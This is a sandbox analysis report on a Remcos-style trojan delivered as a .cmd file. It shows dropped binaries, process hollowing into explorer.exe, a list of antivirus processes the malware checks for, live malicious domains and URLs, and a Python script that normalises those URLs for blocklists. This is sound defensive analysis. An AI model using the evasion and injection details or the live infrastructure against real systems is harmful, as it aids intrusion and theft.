          Source: explorer.exe, 00000012.00000002.3863672524.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3864752529.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
          Source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
          Source: explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3864752529.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000012.00000000.1548457580.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285633326.0000000009378000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
          Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF6E94351EC
          Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF6E9433140
          Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF6E94351EC
          Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF6E9433140
          Source: C:\Users\Public\kn.exe | Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF685523800
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D45ACC
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: GetLocaleInfoA,10_2_02D4A7C4
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D45BD8
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: GetLocaleInfoA,10_2_02D4A810
          Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF6E94351EC
          Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF6E9433140
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6E9448654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF6E9448654
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6855070F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6855070F4
          Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6E942586C GetVersion,4_2_00007FF6E942586C
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68544E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF68544E568
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68543227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF68543227C
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685455648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF685455648
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854354A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF6854354A0
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          1
          Native API
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Disable or Modify Tools
          OS Credential Dumping1
          System Time Discovery
          Remote Services11
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts1
          Shared Modules
          2
          Valid Accounts
          2
          Valid Accounts
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop ProtocolData from Removable Media21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)21
          Access Token Manipulation
          2
          Obfuscated Files or Information
          Security Account Manager1
          System Network Connections Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook812
          Process Injection
          1
          Install Root Certificate
          NTDS1
          File and Directory Discovery
          Distributed Component Object ModelInput Capture113
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Timestomp
          LSA Secrets235
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials441
          Security Software Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
          Masquerading
          DCSync2
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts
          Proc Filesystem3
          Process Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadow1
          Application Window Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation
          Network Sniffing1
          System Owner/User Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd812
          Process Injection
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Behavior Graph ID: 1563771 | Sample: A1 igazol#U00e1s.cmd | Start date: 27/11/2024 | Architecture: WINDOWS | Score: 100

          Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures

          Contacted domains and IPs: www.yzsports200.xyz; www.rnuah.xyz (Performs DNS queries to domains with low reputation); 10 other IPs or domains; aquadream.rs 185.102.77.43, port 443, source ports 49705 and 49706 (HOSTING90UPSTREAMconnectivityCZ, Czech Republic), contacted by AnyDesk.PIF

          Process tree (child processes are marked "started"; a process that received injected code is marked "injected"):
          cmd.exe (started from the sample)
            AnyDesk.PIF (started) | network: aquadream.rs 185.102.77.43:443 | signatures: Machine Learning detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; 4 other signatures
              SndVol.exe (started) | signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
                explorer.exe (injected)
                  msdt.exe (started) | signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)
              cmd.exe (started)
                esentutl.exe (started) | dropped: C:\Users\Public\alpha.pif, PE32 | signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                conhost.exe (started)
            extrac32.exe (started) | dropped: C:\Users\Public\alpha.exe, PE32+ | signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
            alpha.exe (started)
              kn.exe (started) | signatures: Registers a new ROOT certificate; Drops PE files with a suspicious file extension
            5 other processes (started)
              kn.exe (started) | dropped: C:\Users\Public\Libraries\AnyDesk.PIF, PE32
              extrac32.exe (started) | dropped: C:\Users\Public\kn.exe, PE32+

          Source | Detection | Scanner | Label | Link
          A1 igazol#U00e1s.cmd | 16% | ReversingLabs | Script-BAT.Trojan.Remcos |

          Source | Detection | Scanner | Label | Link
          C:\Users\Public\Libraries\AnyDesk.PIF | 100% | Joe Sandbox ML | |
          C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
          C:\Users\Public\alpha.pif | 0% | ReversingLabs | |
          C:\Users\Public\kn.exe | 0% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.askabirokulmumkun.onlineReferer:0%Avira URL Cloudsafe
          http://www.askabirokulmumkun.online/d05n/www.ultangaziescortbayanlari.online0%Avira URL Cloudsafe
          http://www.askabirokulmumkun.online0%Avira URL Cloudsafe
          http://www.9838.xyz/d05n/www.xc31.top0%Avira URL Cloudsafe
          http://www.trl-migrate.online/d05n/www.9838.xyz0%Avira URL Cloudsafe
          http://www.rnuah.xyz/d05n/0%Avira URL Cloudsafe
          http://www.evelupcasino.club/d05n/0%Avira URL Cloudsafe
          http://www.xc31.top/d05n/0%Avira URL Cloudsafe
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/0%Avira URL Cloudsafe
          http://www.trl-migrate.online/d05n/0%Avira URL Cloudsafe
          http://www.estspacefox.shopReferer:0%Avira URL Cloudsafe
          http://www.826mza.top0%Avira URL Cloudsafe
          http://www.trl-migrate.onlineReferer:0%Avira URL Cloudsafe
          http://www.trl-migrate.online0%Avira URL Cloudsafe
          http://www.ebsiteclients.online/d05n/www.rnuah.xyz0%Avira URL Cloudsafe
          http://www.yzsports200.xyz/d05n/www.evelupcasino.club0%Avira URL Cloudsafe
www.atingdilse.site/d05n/ | 0% | Avira URL Cloud | safe
http://www.826mza.top/d05n/www.ursing-caregiver-jobs-za-3.bond | 0% | Avira URL Cloud | safe
http://www.9838.xyz | 0% | Avira URL Cloud | safe
http://www.ustavoglins.store/d05n/ | 0% | Avira URL Cloud | safe
http://www.evelupcasino.clubReferer: | 0% | Avira URL Cloud | safe
http://www.ursing-caregiver-jobs-za-3.bond | 0% | Avira URL Cloud | safe
http://www.ustavoglins.storeReferer: | 0% | Avira URL Cloud | safe
http://www.9838.xyz/d05n/ | 0% | Avira URL Cloud | safe
http://www.evelupcasino.club | 0% | Avira URL Cloud | safe
http://www.826mza.top/d05n/ | 0% | Avira URL Cloud | safe
http://www.ustavoglins.store | 0% | Avira URL Cloud | safe
http://www.ultangaziescortbayanlari.online/d05n/www.yzsports200.xyz | 0% | Avira URL Cloud | safe
http://www.ybzert.online/d05n/www.trl-migrate.online | 0% | Avira URL Cloud | safe
http://www.atingdilse.siteReferer: | 0% | Avira URL Cloud | safe
http://www.yzsports200.xyz/d05n/ | 0% | Avira URL Cloud | safe
https://aquadream.rs/244_Ipkokioahlpx | 0% | Avira URL Cloud | safe
http://www.estspacefox.shop | 0% | Avira URL Cloud | safe
http://www.atingdilse.site/d05n/ | 0% | Avira URL Cloud | safe
http://www.yzsports200.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.estspacefox.shop/d05n/www.ebsiteclients.online | 0% | Avira URL Cloud | safe
http://www.ustavoglins.store/d05n/www.estspacefox.shop | 0% | Avira URL Cloud | safe
http://www.ultangaziescortbayanlari.online/d05n/ | 0% | Avira URL Cloud | safe
http://www.nilink.educationReferer: | 0% | Avira URL Cloud | safe
http://www.xc31.top | 0% | Avira URL Cloud | safe
https://aquadream.rs:443/244_Ipkokioahlp | 0% | Avira URL Cloud | safe
http://www.rnuah.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.atingdilse.site/d05n/www.askabirokulmumkun.online | 0% | Avira URL Cloud | safe
https://aquadream.rs/244_Ipkokioahlp | 0% | Avira URL Cloud | safe
http://www.yzsports200.xyz | 0% | Avira URL Cloud | safe
http://www.atingdilse.site | 0% | Avira URL Cloud | safe
http://www.ebsiteclients.online | 0% | Avira URL Cloud | safe
http://www.ebsiteclients.onlineReferer: | 0% | Avira URL Cloud | safe
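The URL strings in this table are memory artifacts rather than clean indicators: some lack a scheme, several carry a trailing `Referer:` header fragment that sat next to the URL in the process memory, and others run two hostnames together (`http://a/d05n/www.b`). Before such a list goes into a blocklist or a DNS-log hunt it has to be normalised. The Python below is an added example and is not part of the Joe Sandbox report: it takes a handful of rows copied from this table in the fused form they take when the report is exported as plain text (`<url>0%Avira URL Cloudsafe`) and reduces them to distinct hostnames plus the path tokens seen. The row layout, the `Referer:` stripping and the rule that a last path segment shaped like a hostname is a second host are assumptions drawn from this table only.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: rows copied from the URL table above, in the fused
# "<url>0%Avira URL Cloud<verdict>" form a plain-text export of the report produces.
SAMPLE_ROWS = [
    "www.atingdilse.site/d05n/0%Avira URL Cloudsafe",
    "http://www.826mza.top/d05n/www.ursing-caregiver-jobs-za-3.bond0%Avira URL Cloudsafe",
    "http://www.evelupcasino.clubReferer:0%Avira URL Cloudsafe",
    "http://www.ustavoglins.store/d05n/www.estspacefox.shop0%Avira URL Cloudsafe",
    "https://aquadream.rs/244_Ipkokioahlp0%Avira URL Cloudsafe",
    "https://aquadream.rs:443/244_Ipkokioahlp0%Avira URL Cloudsafe",
    "http://www.9838.xyz0%Avira URL Cloudsafe",
]

# Lazy URL group, then "<digits>%", the scanner name, and a one-word verdict.
# Assumption: the scanner column is always "Avira URL Cloud" as in this table.
ROW_RE = re.compile(r"^(?P<url>.+?)(?P<score>\d+%)(?P<engine>Avira URL Cloud)(?P<verdict>\w+)$")
# Something that looks like a hostname: dotted labels ending in an alphabetic TLD.
HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)


def parse_row(row):
    """Split one fused row into (url, score, engine, verdict)."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    return m.group("url", "score", "engine", "verdict")


def split_url(url):
    """Return (hosts, first_path_token) for one memory-string URL.

    Handles the three artefacts seen in the table: a missing scheme, a fused
    'Referer:' fragment at the end, and a second hostname appended after the
    path.  A trailing segment is treated as a host only if it matches HOST_RE,
    so '244_Ipkokioahlp' stays a path token.  Port suffixes such as :443 are
    dropped by urlsplit().hostname.
    """
    url = url.removesuffix("Referer:")
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    hosts = [parts.hostname]
    if segments and HOST_RE.match(segments[-1]):
        hosts.append(segments.pop().lower())
    token = segments[0] if segments else None
    return hosts, token


def summarize(rows):
    """Deduplicate hosts and path tokens across all rows (sorted for stable output)."""
    hosts, tokens = set(), set()
    for row in rows:
        url, _score, _engine, _verdict = parse_row(row)
        row_hosts, token = split_url(url)
        hosts.update(row_hosts)
        if token:
            tokens.add(token)
    return {"hosts": sorted(hosts), "tokens": sorted(tokens)}


if __name__ == "__main__":
    result = summarize(SAMPLE_ROWS)
    print("path tokens:", ", ".join(result["tokens"]))
    for host in result["hosts"]:
        print(host)
```

Two caveats. In the fused form a URL whose path ends in a digit is ambiguous against the `0%` score column (compare the `…crl0` string further down), so the split is only reliable when the table still has its cells, or when the URL column is checked against the Name column of the domain table. And `aquadream.rs`, the one host in the domain table below that resolved to an address, comes out next to the `/d05n/` hosts; the output is an input for triage, not a verdict.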
Name | IP | Active | Malicious | Antivirus Detection | Reputation
aquadream.rs | 185.102.77.43 | true | true | | unknown
www.ustavoglins.store | unknown | unknown | true | | unknown
www.rnuah.xyz | unknown | unknown | true | | unknown
www.9838.xyz | unknown | unknown | true | | unknown
www.trl-migrate.online | unknown | unknown | true | | unknown
www.ebsiteclients.online | unknown | unknown | true | | unknown
www.atingdilse.site | unknown | unknown | true | | unknown
www.askabirokulmumkun.online | unknown | unknown | true | | unknown
www.yzsports200.xyz | unknown | unknown | true | | unknown
www.ultangaziescortbayanlari.online | unknown | unknown | true | | unknown
www.evelupcasino.club | unknown | unknown | true | | unknown
www.estspacefox.shop | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.atingdilse.site/d05n/ | true | Avira URL Cloud: safe | unknown
https://aquadream.rs/244_Ipkokioahlp | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.askabirokulmumkun.online | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/%s/oauth2/authorize | kn.exe | false | | high
https://powerpoint.office.comer | explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSA4 | explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.askabirokulmumkun.onlineReferer: | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xc31.top/d05n/ | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
